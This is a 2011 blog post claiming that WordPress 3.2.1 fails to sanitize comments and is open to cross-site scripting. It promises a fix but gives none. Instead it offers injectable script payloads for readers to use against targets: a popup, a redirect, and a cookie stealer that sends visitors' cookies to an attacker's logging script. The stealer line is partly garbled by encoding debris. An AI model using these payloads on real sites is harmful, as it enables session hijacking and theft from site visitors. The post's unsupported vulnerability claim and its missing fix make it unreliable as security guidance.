Saturday, August 20, 2011
XSS Injection Vulnerability in WordPress 3.2.1
Do you like this story?
Bad news for just about every WordPress blogger out there. Thousands of WordPress 3.2.1 installations are at risk of being compromised. It has been found that the latest version 3.2.1 of WordPress, an extremely popular suite of tools for powering blogs, is vulnerable to XSS injection attack which allows users to inject malicious JavaScript as a result of failure in sanitizing the comments field. Without discussing much about what this vulnerability could do to your blog I will jump to how it works and the solution.
How does it work?
Inject one of the below codes into the comment field of the target. Or use your brain to make a more powerful injection
Popup “alert” Box
<script>alert(‘www.cybertricks.co.cc’)</script>
Redirect to www.cybertricks.co.cc
<script>document.location=”http://cybertricks.co.cc”</script>
So What Isn't It Easy...?Please CommentCookie Stealer (need a logging system in place)
<script>document.location=***8221;***91;url***93;http://your-domain/your***91;/url***93; stealer.php?cookie=***8221; + document.cookie;document.location=***8221;http://the-site-you-are-stealing-from.com”</script>
This post was written by: Ashif Ismail
Ashif Ismail is a professional blogger, Software Programmer and front end web developer. Follow him on Twitter
Subscribe to:
Post Comments (Atom)
0 Responses to “XSS Injection Vulnerability in WordPress 3.2.1”
Post a Comment